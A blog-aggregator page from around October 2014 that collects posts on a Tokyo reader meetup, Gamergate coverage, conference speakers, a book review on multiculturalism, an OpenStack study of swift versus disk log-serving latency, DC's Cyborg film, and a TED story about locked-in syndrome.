Planet Russell

,

Worse Than FailureAnnouncements: Tokyo Meet-up & Site Fixes

Tokyo readers -- I am once again visiting your fine city this week, and thought it'd be fun to try for another Tokyo/TDWTF meetup. Earlier this year, we got together at an izakaya for nomihoudai:

If you're unaware, nomihoudai is an easy way for a group of folks to get as much food and drink from the menu as they'd like for a set price over a set duration, without fussing over details like who ordered what and how many. While Japanese people often see this as a convenient offer, as an American I recognize it for the challenge it is -- and conquer it I shall!

So, if you're up for getting together this Friday (possibly Saturday?) in Shinjuku or Shibuya area, please drop me a note via the contact form or direct, apapadimoulis/inedo.com.

As for everyone else, thanks for submitting the bugs/issues/suggestions for the new site. We just fixed a bunch of them earlier today, and will continue to fix stuff as it comes in. Your help is greatly appreciated -- not just for submitting issues but for helping with fixed teh codez as well. If you're brave enough to explore the TDWTF codebase, I'll gladly send you some brand new TDWTF stickers with the updated logo.

Planet DebianJunichi Uekawa: Migrating my diary system to some new server.

Migrating my diary system to some new server. I took the chance to migrate my system from CVS-based system to Git-based system. It no longer relies on a chain of CVS commit hooks, and now I have a makefile to publish. I also took the chance to rewrite my 15 year old elisp so that I can use UTF-8 instead of a mix of ISO-2022-JP and EUC-JP. Dusting off some old code. No test exists, what could go wrong!

Geek FeminismFish Are Friends, Not Linkspam (21 October 2014)

#Gamergate

  • On Gamergate: a letter from the editor | Polygon (October 17): “Video games are capital “C” Culture now. There won’t be less attention, only more. There won’t be less scrutiny. There certainly won’t be less diversity, in the fiction of games themselves or in the demographics of their players. What we’re in control of is how we respond to that expansion, as journalists, as developers, as consumers. Step one has to be a complete rejection of the tools of harassment and fear — we can’t even begin to talk about the interesting stuff while people are literally scared for their lives. There can be no dialogue with a leaderless organization that both condemns and condones this behavior, depending on who’s using the hashtag.”
  • Gamergate threats: Why it’s so hard to prosecute the people targeting Zoe Quinn and Anita Sarkeesian | Slate (October 17): “The light penalties attached to many of these online crimes also deter officials from taking them seriously, because the punishment doesn’t justify the resources required to investigate and prosecute them”
  • Of Gamers, Gates, and Disco Demolition: The Roots of Reactionary Rage | The Daily Beast (October 16): “Our various “culture wars” tend to boil down to one specific culture war, the one about men wanting to feel like Real Men and lashing out at the women who won’t let them.”
  • Gamergate in Posterity | The Awl (October 15): “Maybe there will be some small measure of accountability in the far future, not just for public figures and writers and activists, but for all the people who could not or would not see their “trolling” for what it really was. Maybe, when their kids ask them what they were like when they were young, they will have no choice but to say: I was a piece of shit. I was part of a movement. I marched, in my sad way, against progress. Don’t take my word for it. You can Google it!”

We link to a variety of sources, some of which are personal blogs.  If you visit other sites linked herein, we ask that you respect the commenting policy and individual culture of those sites.

You can suggest links for future linkspams in comments here, or by using the “geekfeminism” tag on Pinboard, Delicious or Diigo; or the “#geekfeminism” tag on Twitter. Please note that we tend to stick to publishing recent links (from the last month or so).

Thanks to everyone who suggested links.

,

Planet Linux Australialinux.conf.au News: Speaker Feature: Denise Paolucci, Gernot Heiser

Denise Paolucci

Denise Paolucci

When Your Codebase Is Nearly Old Enough To Vote

11:35 am Friday 16th January 2015

Denise is one of the founders of Dreamwidth, a journalling site and open source project forked from Livejournal, and one of only two majority-female open source projects.

Denise has appeared at multiple open source conferences to speak about Dreamwidth, including OSCON 2010 and linux.conf.au 2010.

For more information on Denise and her presentation, see here.


Gernot Heiser

Gernot Heiser

seL4 Is Free - What Does This Mean For You?

4:35pm Thursday 15th January 2015

Gernot is a Scientia Professor and the John Lions Chair for operating systems at the University of New South Wales (UNSW).

He is also leader of the Software Systems Research Group (SSRG) at NICTA. In 2006 he co-founded Open Kernel Labs (OK Labs, acquired in 2012 by General Dynamics) to commercialise his L4 microkernel technology

For more information on Gernot and his presentation, see here. You can follow him as @GernotHeiser and don’t forget to mention #LCA2015.

TED10 weird things I accidentally learned about New York

New York, . Here's one of my favorite images of it, Image: Wikipedia/George Schlegel lithographers

New York, New York, it’s a wonderful town! Here’s one of my favorite images of it, created by George Schlegel lithographers in 1873, while the Brooklyn Bridge was under construction. Image: Wikipedia

New York is a playground of absurdity. I’ve lived here on and off for the past decade. Since I ate my first workday lunch in a “park” in downtown Manhattan, I’ve been blindly accepting everyone’s inexplicable behavior in this city, not least of all the block-long cronut line I pass on my way to work every morning. So when I started curating the speaker program for TEDxNewYork — which is less than two weeks away — it seemed a productively impossible task: to expand my view beyond my own little pocket of the city.

New York is an extrovert, leading and looking forward, not looking underground, inside or backwards. So finding local speakers with ideas that haven’t yet surfaced has been surprisingly difficult. But during our curation research, my team and I fell down a lot of research rabbit holes, each leading to something we just didn’t know about New York’s underbelly. Doing research like this means a lot of nights on the Internet — Wikipedia lists, New Yorker archives, the tables of contents of academic publications, Reddit — but also just talking to people — to strangers in bars, to your friend about their dissertation, to others standing on the subway platform. Once people know you’re looking for local stories, they start volunteering weird information. When you hear about a person, place or thing from multiple sources before NPR or The New York Times has caught on, you start to connect the dots as to what’s about to break out.

Keeping your ear to the dirty Manhattan ground doesn’t always yield great TEDx Talks, but it does make for good watercooler conversation. Below, 10 facts we learned from our research that we thought you’d enjoy.

  1. City Hall used to be a place for “sturdy beggars.” In 1735, New York built its first almshouse where City Hall is today. According to urban archaeologist Alyssa Loorya, one of our speakers, “It served five groups: ‘Poor Needy Persons,’ ‘Idle Wandering Vagabonds,’ ‘Sturdy Beggars,’ ‘Parents of Bastard Children,’ and the ‘bastard’ children.”
    .
  2. If you drop your Blackberry into the subway tracks, you can get it back from these guys. Dubbed “the fishermen of the subway” they use homemade tools to recover the things New Yorkers drop on the tracks.
    .
  3. One fire hydrant and a badly designed parking spot can net the city $33,000 in a year. But: Thanks to speaker Ben Wellington, who first posted this data on his blog, the city also shows that it can self-correct.
    .
  4. Some subway buskers have agents. We were surprised to discover this when we approached one.
    .
  5. New York State is buying out 750 homes in Staten Island and Long Island as a strategy to protect against future hurricanes. The City, which normally favors rebuilding over demolishing, turned down residents, so the people of Staten Island went over their heads to the State. A friend in an urban planning program at MIT told me about this over a beer one night recently, and I can’t say I’ve met one Manhattanite who knows about it.
    .
  6. The ubiquitous voice of subway announcements lives in Maine. Her name is Carolyn Hopkins, and she does non-New York gigs, too: She’s the voice of 200 different airports.
    .
  7. As of June this year, New York now has a Morbid Anatomy Museum. You can take workshops there on some pretty weird stuff.
    .
  8. There are only two states in the US that automatically charge 16- and 17-year-old as adults, and New York is one of them. Unhealthy jail systems have been in the news quite a bit since Preet Bharara, the US attorney in Manhattan, published a lengthy report in August on treatment of teens in Rikers Island. Now as solitary confinement for teens at Rikers comes to an end we turn to our speaker Ismael Nazario, who was in solitary in Rikers for over 300 days before ever being convicted of a crime, to hear his story.
    .
  9. The James A. Farley Post Office, the enormous historic building next to Penn Station bears the inscription: “Neither snow nor rain nor heat nor gloom of night stays these couriers from the swift completion of their appointed rounds.” You can take a tour of the nearly empty building, or even have a fashion show. (You can also try to have a TEDx event there. Not that we would know.)
    .
  10. Oh, and one thing everyone knows: The Rent is (still) 2 Damn High.

TEDxNewYork 2014 — themed “Grand, central” — will take place on November 1, in Williamsburg, Brooklyn. Find out more.


RacialiciousWho We Be Examines the War on Multiculuralism

“Color is not a human or a personal reality, it is a political reality.” – James Baldwin

This is not a book review, because Who We Be isn’t really a book. It’s more of a thoughtful examination of how the United States arrived at this point in racial history.

Long time friend of the blog Jeff Chang is the author of the American Book award winning Can’t Stop, Won’t Stop: A History of the Hip Hop Generation and editor of the anthology Total Chaos: The Art and Aesthetics of Hip Hop. To say we’ve been waiting for Who We Be is an understatement.

But in the introduction, Chang frames the core of the most recent case of racial backlash. Explaining the outsized reaction by some whites to President Obama, Chang notes:

In the 1830s white minstrels had put on blackface, creating space for the white working class to challenge the elite, while keeping Blacks locked into their racial place. Obama now appeared as a dual symbol of oppression. Because of his Blackness, he was even more of an outsider—and in that sense, even more American—than them. But he was also the president. His Blackness did not just confer moral and existential claims, it was backed by the power of the state.

And there went everything.

As much as we like to talk about the inevitability of America being majority-minority in 2042, the events playing out across the nation show that most places are outright hostile to the idea that people of color are equal Americans, with the same rights, privileges, representation, and agenda setting power bestowed to whites. Chang turns his critical eye to shifts in culture which becomes documentation of rise (and fall?) of multiculturalism.

The opening chapter is on the funny pages and American comic culture acting as a barometer for race relations. Chang finds amazing gems – Morrie Turner’s Wee Pals frames the narrative since Turner was the first black syndicated cartoonist, but we also hear about the work of Jackie Ormes, Gus Arriola, Barbara Brandon-Croft, Ray Billingsley, George Harriman, Robb Armstrong, and Oliver Harrington.

Chang also points to the variety of issues at play in cartoons like the friendly Sambo model that led to popular characters like Felix the Cat, Mickey Mouse, and Bugs Bunny. Racism was even in the inking -comics used three colors: black, white, and the pinkish “flesh” tone. Anyone who did not conform became odd tones of purple. The modern world of comics hasn’t improved much – even with established cartoonists like Lalo Alcaraz and Keith Knight doing their thing, the Sunday comics pages have stubbornly resisted full integration.

From comics, Chang moves to art and the marketing of identity. Then on to politics, culture,The DREAMers, politics, war, neoliberalism, capitalism Occupy Wall Street and more in a bid to make racial sense of the country’s political mood.

While reading, one could wonder if society learned anything from the past 40 years? Or has polite society only learned to spout the “correct” answers? Later in the book, Chang discusses the phenomenon of people saying they want diversity, but seeing the reality play out in one of the biggest areas of segregation in America – housing:

How much did Americans value diversity and integration? Over the course of four decades, the Gallup survey had asked whites, “Would you move if great numbers of Blacks moved into your neighborhood?” In 1958, 79% said they would. In 1997, 75% said they would not. A month after Obama’s victory, a report from the Pew Research Center showed that almost 2 in 3 Americans—including 52% of Republicans, 60% of whites, 83% of Blacks, and 76% of 18-29 year olds—said that they preferred to live in a community made up of people who were a mix of different races. The numbers were similar for religious, political, and socioeconomic diversity.

Fully 68% of those making $100,000 or more a year—a significantly larger proportion than every other income bracket—said they preferred to live in a community with a mix of economic classes. But when Stanford professors Sean F. Reardon and Kendra Bischoff examined the data from 1970 to 2009, they found that not only had residential segregation by income soared, the wealthy had segregated themselves the fastest.

Large majorities told pollsters they wanted integrated schools and diversity in education. Pundits and politicians would often trot out such these polls as cause for optimism around racial justice issues. But in light of the actual social facts, the survey data looked less like an emerging consensus for cultural equity than evidence that multiculturalism had made some better primed to answer the questions “correctly.” For in this colorized generation, public schools were resegregating at a dramatic rate.

By 2010, 80% of Latinos and 74% of Blacks attended majority non-white schools. Around 40% of Blacks and Latinos in public schools attended hypersegregated schools in which 90-100% of the students were nonwhite. Blacks and Latinos were also twice as likely to attend a school predominantly serving low-income students than white or Asian students. White students were the most racially isolated of all—the average white student attended a school that was 75% white.

Resegregation did not escape even the rapidly diversifying suburbs or the most liberal strongholds. From city to exurb, the San Francisco Bay Area— one of the nation’s most diverse regions, the birthplace of the multiculturalism movement, and the site of Berkeley’s national model public school desegregation program—also boasted California’s highest rates of White isolation. Although white students made up only 28% of the Bay Area’s student-age population, 65% of them attended majority white schools. Those schools were eight times less likely than predominantly non-white ones to be deemed “high-problem” schools.

After 1968, busing, court orders, and district plans had helped to integrate the schools from the deep South to the Northwest. In turn school desegregation climbed sharply and peaked in the late 1980s. But then conservative challenges to desegregation mounted, and anti-integrationists began to accumulate victories in the courts and the legislatures. During the 1990s, while multiculturalists were winning the battle to change school curriculum and staffing, they were losing the battle to desegregate the next generation of public school students. By the new millennium, the same southern school systems that had made the most progress toward integration were the fastest to resegregate. Progress had always been fragile.

The book ends on equal parts heartbreak and hope, juxtaposing a few different stories to paint a picture of where we are.

The ambiguous ending fits the overall theme of the book – after all, isn’t that what we go through as people of color everyday?

Ultimately, Who We Be can feel a little disjointed – condensing America’s entire racial history in imagery is a major feat, and the book is much better at raising ideas and questions than providing concrete answers. But anyone who cares about racial equity should read this book – if for nothing else than to supply the foundation for our action.

Racialicious is giving away a copy of Who We Be. To enter, leave a comment addressing this question: “What does multiculturalism mean now and what needs to happen next?”

The post Who We Be Examines the War on Multiculuralism appeared first on Racialicious - the intersection of race and pop culture.

Oreilly Linux PlanetTizen Cookbook

Tizen is an open source Linux-based software platform for a variety of devices, from smartphones and watches to in-vehicle infotainment. Application development is based on open standards and HTML5 is the primary development technology.

Starting with a detailed description of using the Tizen SDK, you will delve into Tizen development on Linux, Windows, and Mac OS with this book. You will learn to use the Tizen IDE and move on to using the web simulator and device emulator.

The recipes in this book are invaluable in exploring and optimizing Tizen to develop exciting mobile and web applications.

Geek FeminismQuick hit: A good example of how to handle trolls

With his permission, I’m reposting this blog comment from Marco Rogers, in a reply to an anti-feminist comment on a blog post about women in tech that he wrote 2 1/2 years ago. Although the post is that old, the comment is from a few days ago, because even years later, anti-feminist trolls are stumbling across Marco’s blog post and feeling the need to express their displeasure with it.

I’m reposting Marco’s comment because I think it’s a good example about how to respond to a troll. I would love to see more men let their anti-feminist peers know that uninformed anti-feminist wankery is a waste of time. And I would love to do that more often myself, rather than engaging with it.

Hi [REDACTED]. I thought a long time about whether to let this comment stand or delete it. I do listen to input from different perspectives. I read this entire thing. And I’m sorry to say it was a waste of my time.

I’m afraid this reply won’t be very constructive. I had to chose whether to waste further time dismantling your false logic, and I had to take into account whether it would make any difference to you or anyone reading. I don’t think it will. In my experience, it’s very difficult to educate men who think like you do.

I’ll admit it also annoys me that you would come and write a small novel in my blog comments but not say anything new or original. Men have been making this argument that their long history of sexism is somehow the natural order of things since the beginning of time. It’s not revelatory, it’s not some profound wisdom that people haven’t heard, it’s boring. The feminist/womanist movement grew in direct opposition to all the nonsense you spouted above. There is a ton of literature that debunks and rejects every single point you are poorly trying to make. The least you can do is educate yourself on the system you’re up against, so you can sound more cogent and have an actual chance of convincing anyone.

The question remains of whether I let your comment stay up. I think I will. Not because I feel compelled to represent multiple viewpoints here. This is my blog and I choose what goes here. But I’ll leave it because I’m no longer afraid of letting people read tripe like this. You’re losing. We WILL create a world where the mentality of men like you is a minority and women get to exist as themselves without fear. You can’t stop it. Stay mad bro. Thanks for dropping by.

Planet DebianDebConf team: DebConf15 dates are set, come and join us! (Posted by DebConf15 team)

At DebConf14 in Portland, Oregon, USA, next year’s DebConf team presented their conference plans and announced the conference dates: DebConf15 will take place from 15 to 22 August 2015 in Heidelberg, Germany. On the Open Weekend on 15/16 August, we invite members of the public to participate in our wide offering of content and events, before we dive into the more technical part of the conference during following week. DebConf15 will also be preceeded by DebCamp, a time and place for teams to gather for intensive collaboration.

A set of slides from a quick show-case during the DebConf14 closing ceremony provide a quick overview of what you can expect next year. For more in-depth information, we invite you to watch the video recording of the full session, in which the team provides detailed information on the preparations so far, location and transportation to the venue at Heidelberg, the different rooms and areas at the Youth Hostel (for accommodation, hacking, talks, and social activities), details about the infrastructure that are being worked on, and the plans around the conference schedule.

We invite everyone to join us in organising this conference. There are different areas where your help could be very valuable, and we are always looking forward to your ideas. Have a look at our wiki page, join our IRC channels and subscribe to our mailing lists.

We are also contacting potential sponsors from all around the globe. If you know any organisation that could be interested, please consider handing them our sponsorship brochure or contact the fundraising team with any leads.

Let’s work together, as every year, on making the best DebConf ever!

Planet Linux AustraliaJoshua Hesketh: OpenStack infrastructure swift logs and performance

Turns out I’m not very good at blogging very often. However I thought I would put what I’ve been working on for the last few days here out of interest.

For a while the OpenStack Infrastructure team have wanted to move away from storing logs on disk to something more cloudy – namely, swift. I’ve been working on this on and off for a while and we’re nearly there.

For the last few weeks the openstack-infra/project-config repository has been uploading its CI test logs to swift as well as storing them on disk. This has given us the opportunity to compare the last few weeks of data and see what kind of effects we can expect as we move assets into an object storage.

  • I should add a disclaimer/warning, before you read, that my methods here will likely make statisticians cringe horribly. For the moment though I’m just getting an indication for how things compare.

The set up

Fetching files from an object storage is nothing particularly new or special (CDN’s have been doing it for ages). However, for our usage we want to serve logs with os-loganalyze giving the opportunity to hyperlink to timestamp anchors or filter by log severity.

First though we need to get the logs into swift somehow. This is done by having the job upload its own logs. Rather than using (or writing) a Jenkins publisher we use a bash script to grab the jobs own console log (pulled from the Jenkins web ui) and then upload it to swift using credentials supplied to the job as environment variables (see my zuul-swift contributions).

This does, however, mean part of the logs are missing. For example the fetching and upload processes write to Jenkins’ console log but because it has already been fetched these entries are missing. Therefore this wants to be the very last thing you do in a job. I did see somebody do something similar where they keep the download process running in a fork so that they can fetch the full log but we’ll look at that another time.

When a request comes into logs.openstack.org, a request is handled like so:

  1. apache vhost matches the server
  2. if the request ends in .txt.gz, console.html or console.html.gz rewrite the url to prepend /htmlify/
  3. if the requested filename is a file or folder on disk, serve it up with apache as per normal
  4. otherwise rewrite the requested file to prepend /htmlify/ anyway

os-loganalyze is set up as an WSGIScriptAlias at /htmlify/. This means all files that aren’t on disk are sent to os-loganalyze (or if the file is on disk but matches a file we want to mark up it is also sent to os-loganalyze). os-loganalyze then does the following:

  1. Checks the requested file path is legitimate (or throws a 400 error)
  2. Checks if the file is on disk
  3. Checks if the file is stored in swift
  4. If the file is found markup (such as anchors) are optionally added and the request is served
    1. When serving from swift the file is fetched via the swiftclient by os-loganlayze in chunks and streamed to the user on the fly. Obviously fetching from swift will have larger network consequences.
  5. If no file is found, 404 is returned

If the file exists both on disk and in swift then step #2 can be skipped by passing ?source=swift as a parameter (thus only attempting to serve from swift). In our case the files exist both on disk and in swift since we want to compare the performance so this feature is necessary.

So now that we have the logs uploaded into swift and stored on disk we can get into some more interesting comparisons.

Testing performance process

My first attempt at this was simply to fetch the files from disk and then from swift and compare the results. A crude little python script did this for me: http://paste.openstack.org/show/122630/

The script fetches a copy of the log from disk and then from swift (both through os-loganalyze and therefore marked-up) and times the results. It does this in two scenarios:

  1. Repeatably fetching the same file over again (to get a good average)
  2. Fetching a list of recent logs from gerrit (using the gerrit api) and timing those

I then ran this in two environments.

  1. On my local network the other side of the world to the logserver
  2. On 5 parallel servers in the same DC as the logserver

Running on my home computer likely introduced a lot of errors due to my limited bandwidth, noisy network and large network latency. To help eliminate these errors I also tested it on 5 performance servers in the Rackspace cloud next to the log server itself. In this case I used ansible to orchestrate the test nodes thus running the benchmarks in parallel. I did this since in real world use there will often be many parallel requests at once affecting performance.

The following metrics are measured for both disk and swift:

  1. request sent – time taken to send the http request from my test computer
  2. response – time taken for a response from the server to arrive at the test computer
  3. transfer – time taken to transfer the file
  4. size – filesize of the requested file

The total time can be found by adding the first 3 metrics together.

 

Results

Home computer, sequential requests of one file

 

The complementary colours are the same metric and the darker line represents swift’s performance (over the lighter disk performance line). The vertical lines over the plots are the error bars while the fetched filesize is the column graph down the bottom. Note that the transfer and file size metrics use the right axis for scale while the rest use the left.

As you would expect the requests for both disk and swift files are more or less comparable. We see a more noticable difference on the responses though with swift being slower. This is because disk is checked first, and if the file isn’t found on disk then a connection is sent to swift to check there. Clearly this is going to be slower.

The transfer times are erratic and varied. We can’t draw much from these, so lets keep analyzing deeper.

The total time from request to transfer can be seen by adding the times together. I didn’t do this as when requesting files of different sizes (in the next scenario) there is nothing worth comparing (as the file sizes are different). Arguably we could compare them anyway as the log sizes for identical jobs are similar but I didn’t think it was interesting.

The file sizes are there for interest sake but as expected they never change in this case.

You might notice that the end of the graph is much noisier. That is because I’ve applied some rudimentary data filtering.

request sent (ms) – disk request sent (ms) – swift response (ms) – disk response (ms) – swift transfer (ms) – disk transfer (ms) – swift size (KB) – disk size (KB) – swift
Standard Deviation 54.89516183 43.71917948 56.74750291 194.7547117 849.8545127 838.9172066 7.121600095 7.311125275
Mean 283.9594368 282.5074598 373.7328851 531.8043908 5091.536092 5122.686897 1219.804598 1220.735632

 

I know it’s argued as poor practice to remove outliers using twice the standard deviation, but I did it anyway to see how it would look. I only did one pass at this even though I calculated new standard deviations.

 

request sent (ms) – disk request sent (ms) – swift response (ms) – disk response (ms) – swift transfer (ms) – disk transfer (ms) – swift size (KB) – disk size (KB) – swift
Standard Deviation 13.88664039 14.84054789 44.0860569 115.5299781 541.3912899 515.4364601 7.038111654 6.98399691
Mean 274.9291111 276.2813889 364.6289583 503.9393472 5008.439028 5013.627083 1220.013889 1220.888889

 

I then moved the outliers to the end of the results list instead of removing them completely and used the newly calculated standard deviation (ie without the outliers) as the error margin.

Then to get a better indication of what are average times I plotted the histograms of each of these metrics.

Here we can see a similar request time.
 

Here it is quite clear that swift is slower at actually responding.
 

Interestingly both disk and swift sources have a similar total transfer time. This is perhaps an indication of my network limitation in downloading the files.

 

Home computer, sequential requests of recent logs

Next from my home computer I fetched a bunch of files in sequence from recent job runs.

 

 

Again I calculated the standard deviation and average to move the outliers to the end and get smaller error margins.

request sent (ms) – disk request sent (ms) – swift response (ms) – disk response (ms) – swift transfer (ms) – disk transfer (ms) – swift size (KB) – disk size (KB) – swift
Standard Deviation 54.89516183 43.71917948 194.7547117 56.74750291 849.8545127 838.9172066 7.121600095 7.311125275
Mean 283.9594368 282.5074598 531.8043908 373.7328851 5091.536092 5122.686897 1219.804598 1220.735632
Second pass without outliers
Standard Deviation 13.88664039 14.84054789 115.5299781 44.0860569 541.3912899 515.4364601 7.038111654 6.98399691
Mean 274.9291111 276.2813889 503.9393472 364.6289583 5008.439028 5013.627083 1220.013889 1220.888889

 

What we are probably seeing here with the large number of slower requests is network congestion in my house. Since the script requests disk, swift, disk, swift, disk.. and so on this evens it out causing a latency in both sources as seen.
 

Swift is very much slower here.

 

Although comparable in transfer times. Again this is likely due to my network limitation.
 

The size histograms don’t really add much here.
 

Rackspace Cloud, parallel requests of same log

Now to reduce latency and other network effects I tested fetching the same log over again in 5 parallel streams. Granted, it may have been interesting to see a machine close to the log server do a bunch of sequential requests for the one file (with little other noise) but I didn’t do it at the time unfortunately. Also we need to keep in mind that others may be access the log server and therefore any request in both my testing and normal use is going to have competing load.
 

I collected a much larger amount of data here making it harder to visualise through all the noise and error margins etc. (Sadly I couldn’t find a way of linking to a larger google spreadsheet graph). The histograms below give a much better picture of what is going on. However out of interest I created a rolling average graph. This graph won’t mean much in reality but hopefully will show which is faster on average (disk or swift).
 

You can see now that we’re closer to the server that swift is noticeably slower. This is confirmed by the averages:

 

  request sent (ms) – disk request sent (ms) – swift response (ms) – disk response (ms) – swift transfer (ms) – disk transfer (ms) – swift size (KB) – disk size (KB) – swift
Standard Deviation 32.42528982 9.749368282 245.3197219 781.8807534 1082.253253 2737.059103 0 0
Mean 4.87337544 4.05191168 39.51898688 245.0792916 1553.098063 4167.07851 1226 1232
Second pass without outliers
Standard Deviation 1.375875503 0.8390193564 28.38377158 191.4744331 878.6703183 2132.654898 0 0
Mean 3.487575109 3.418433003 7.550682037 96.65978872 1389.405618 3660.501404 1226 1232

 

Even once outliers are removed we’re still seeing a large latency from swift’s response.

The standard deviation in the requests now have gotten very small. We’ve clearly made a difference moving closer to the logserver.

 

Very nice and close.
 

Here we can see that for roughly half the requests the response time was the same for swift as for the disk. It’s the other half of the requests bringing things down.
 

The transfer for swift is consistently slower.

 

Rackspace Cloud, parallel requests of recent logs

Finally I ran just over a thousand requests in 5 parallel streams from computers near the logserver for recent logs.

 

Again the graph is too crowded to see what is happening so I took a rolling average.

 

 

request sent (ms) – disk request sent (ms) – swift response (ms) – disk response (ms) – swift transfer (ms) – disk transfer (ms) – swift size (KB) – disk size (KB) – swift
Standard Deviation 0.7227904332 0.8900549012 434.8600827 909.095546 1913.9587 2132.992773 6.341238774 7.659678352
Mean 3.515711867 3.56191383 145.5941102 189.947818 2427.776165 2875.289455 1219.940039 1221.384913
Second pass without outliers
Standard Deviation 0.4798803247 0.4966553679 109.6540634 171.1102999 1348.939342 1440.2851 6.137625464 7.565931993
Mean 3.379718381 3.405770445 70.31323922 86.16522485 2016.900047 2426.312363 1220.318912 1221.881335

 

The averages here are much more reasonable than when we continually tried to request the same file. Perhaps we’re hitting limitations with swifts serving abilities.

 

I’m not sure why we have sinc function here. A network expert may be able to tell you more. As far as I know this isn’t important to our analysis other than the fact that both disk and swift match.
 

Here we can now see swift keeping a lot closer to disk results than when we only requested the one file in parallel. Swift is still, unsurprisingly, slower overall.
 

Swift still loses out on transfers but again does a much better job of keeping up.
 

Error sources

I haven’t accounted for any of the following swift intricacies (in terms of caches etc) for:

  • Fetching random objects
  • Fetching the same object over and over
  • Fetching in parallel multiple different objects
  • Fetching the same object in parallel

I also haven’t done anything to account for things like file system caching, network profiling, noisy neighbours etc etc.

os-loganalyze tries to keep authenticated with swift, however

  • This can timeout (causes delays while reconnecting, possibly accounting for some spikes?)
  • This isn’t thread safe (are we hitting those edge cases?)

We could possibly explore getting longer authentication tokens or having os-loganalyze pull from an unauthenticated CDN to add the markup and then serve. I haven’t explored those here though.

os-loganalyze also handles all of the requests not just from my testing but also from anybody looking at OpenStack CI logs. In addition to this it also needs to deflate the gzip stream if required. As such there is potentially a large unknown (to me) load on the log server.

In other words, there are plenty of sources of errors. However I just wanted to get a feel for the general responsiveness compared to fetching from disk. Both sources had noise in their results so it should be expected in the real world when downloading logs that it’ll never be consistent.

Conclusions

As you would expect the request times are pretty much the same for both disk and swift (as mentioned earlier) especially when sitting next to the log server.

The response times vary but looking at the averages and the histograms these are rarely large. Even in the case where requesting the same file over and over in parallel caused responses to go slow these were only in the magnitude of 100ms.

The response time is the important one as it indicates how soon a download will start for the user. The total time to stream the contents of the whole log is seemingly less important if the user is able to start reading the file.

One thing that wasn’t tested was streaming of different file sizes. All of the files were roughly the same size (being logs of the same job). For example, what if the asset was a few gigabytes in size, would swift have any significant differences there? In general swift was slower to stream the file but only by a few hundred milliseconds for a megabyte. It’s hard to say (without further testing) if this would be noticeable on large files where there are many other factors contributing to the variance.

Whether or not these latencies are an issue is relative to how the user is using/consuming the logs. For example, if they are just looking at the logs in their web browser on occasion they probably aren’t going to notice a large difference. However if the logs are being fetched and scraped by a bot then it may see a decrease in performance.

Overall I’ll leave deciding on whether or not these latencies are acceptable as an exercise for the reader.

RacialiciousOn DC Entertainment, Cyborg, And Going Back To The Afrofuture

By Arturo R. García

DC Entertainment scored a rare PR victory over archrival Marvel over the weekend when it announced its upcoming slate of films. At first glance, this latest take on the DC movie universe instantly puts Marvel’s to shame when it comes to inclusion.

But besides the far-flung timetable involved, it very much remains to be seen whether the company is willing to put in the work to elevate its non-white heroes to a position befitting their upcoming roles on the big screen.

Here’s how the schedule looks, courtesy of Slate:

Not only does this signal the long-awaited arrival of Wonder Woman in her own solo feature, but the Flash movie will be led by a queer actor in Ezra Miller. And that’s before getting to the two POC leads in Jason Momoa’s Aquaman and, perhaps more surprisingly, Ray Fisher starring as Cyborg.

Ray Fisher (right) will play Cyborg for DC Entertainment. image via wn.com

If you’ve never heard of Fisher, don’t be surprised; according to IMDB, his appearance in Batman v. Superman: Dawn of Justice will constitute his first major on-screen role. No pressure, right?

But look at the timeline again. Throw in Dwayne “The Rock” Johnson appearing in Shazam, and it’s likely that POC will not be prominent in a DCE film for at least three years. The X-factor here is Suicide Squad, which appears to be on the fast track and should by all rights include Amanda Waller. Even if it means the “sexy” version unveiled three years ago as part of the company’s comics relaunch.

A cynical observer might point out that waiting until 2018 for an Aquaman film starring Momoa and Fisher’s starring role two years(!) later gives DC enough time to scuttle their plans if Dawn of Justice is as much of a disappointment as Man of Steel. Or that Aquaman and Cyborg’s position in the movie pipeline reflects their standing within the Justice League. They’re such valued members that the Suicide Squad got the nod first, and Cyborg has to wait for two Justice League movies before getting his shot. A cynic might argue that the only reason Cyborg isn’t dead last is because Ryan Reynolds’ turn as Hal Jordan was enough of a flop that the Green Lantern movie brand still hasn’t recovered.

Cyborg in the “Super Powers Team: Galactic Guardians” cartoon. Image via DC Wikia.

On the bright side, DC now has no excuse to decisively elevate Cyborg into the top tier of its roster, even if most sensible fans wish John Stewart were getting that same treatment. It’s important to remember, first of all, that Victor Stone’s inclusion in the Justice League’s “New 52″ comics roster isn’t without precedent; in 1985, the character was featured on the Super Powers Team: Galactic Guardians animated series, the final incarnation of the venerable SuperFriends franchise.

Cyborg on the cover of “Tales of the New Teen Titans” #1, as published in June 1982. Image via Wikipedia.

Then, as now, Cyborg was the junior member of the team — the POV character for the audience and the team’s designated IT person. Which probably seemed fine to casual viewers, but was in fact a reduction of his much larger role in DC’s hottest property of that time, the Teen Titans comic. As conceived by Marv Wolfman and George Perez, the Victor Stone of the ’80s had the benefit of a full journey from being horrified at his condition to eventually leading the team and forging a new family relationship with them.

But just as John Stewart went from a stalwart hero to one with a higher profile thanks to the Justice League and Justice League Unlimited series, another version of the Titans brand put Cyborg in the public eye:

<iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="http://www.youtube.com/embed/v_XQXmsOPCQ" width="420"></iframe>

Cyborg in the “Teen Titans Go!” animated series. Image via Fanpop.com.

It’s very possible that, to non-comics fans, their image of Cyborg is of the high-appetite, high-energy version from Teen Titans Go!. A funny guy, sure, but maybe not the kind of hero that’s going to fill up a multiplex. If DC is serious about making the character the next great POC movie superhero, we’d like to argue that the company needs to split the difference: show his traumatic origin, sure, but take him beyond the JLA’s sidekick and let his film reach for the afrofuturistic heights he’s perfectly positioned to reach. A movie-going public living in an increasingly tech-reliant world could really get behind a hero who can plumb the depths of the grid from anywhere in the physical world. If DC wants to end its “phase one” with a bang, it needs to stop treating Cyborg like the last one in line, and understand that for this position in pop culture, he’s the first of his kind.

The post On DC Entertainment, Cyborg, And Going Back To The Afrofuture appeared first on Racialicious - the intersection of race and pop culture.

TEDWhat’s it like to live with locked-in syndrome? One family’s experience

TED Fellow Kitra Cahana shares the story of her father at TEDMED. Photo: Courtesy of TEDMED

Kitra Cahana shares the extraordinary story of her father’s brain stem stroke, a catastrophe that transformed into an inspiring spiritual journey. Photo: TEDMED

Three years ago, Rabbi Ronnie Cahana suffered a rare brain stem stroke that left him fully conscious, yet his entire body paralyzed. It’s a condition known as “locked-in syndrome.”

Last month, TED Fellow Kitra Cahana spoke of her father’s experience at TEDMED (watch her talk, “My father, locked in his body but soaring free”), revealing how her family cocooned Rabbi Cahana in love, and how a system of blinking, in response to the alphabet, patiently allowed him to dictate poems, sermons and letters to his loved ones and to his congregation.

